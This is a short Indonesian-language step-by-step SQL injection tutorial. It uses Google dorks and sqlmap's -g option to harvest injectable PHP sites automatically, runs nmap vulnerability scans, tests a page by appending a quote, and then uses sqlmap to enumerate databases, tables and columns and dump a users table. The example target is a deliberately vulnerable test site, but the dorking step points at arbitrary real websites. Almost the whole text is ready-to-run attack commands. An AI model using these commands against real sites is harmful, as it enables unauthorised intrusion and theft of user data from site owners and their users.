inurl:/*.php?id=
cari auto target dari sqlmap
python3 sqlmap.py -g "inurl:\".php?id=1\""
atau lebih simple
python3 sqlmap.py -g "inurl:\".php?=*\""
test kerentanan target dari nmap
nmap -T4 -sV --script vuln testphp.vulnweb.com -v
output:
copy salah satu dan paste ke google dan tambahkan kutip 1 [ ' ] dibelakang link
http://testphp.vulnweb.com/listproducts.php?cat=4'
jika halaman web error seperti ini
temukan database dari sqlmap
python3 sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=4 --dbs
output:
temukan daftar tabel dari database acuart
python3 sqlmap.py -u webtarget --tables -D acuart
output:
dapatkan kolom tabel
sqlmap -u webtarget --columns -T user
output:
mendapatkan data
sqlmap -u webtarget --dump -D acuart -T users
output: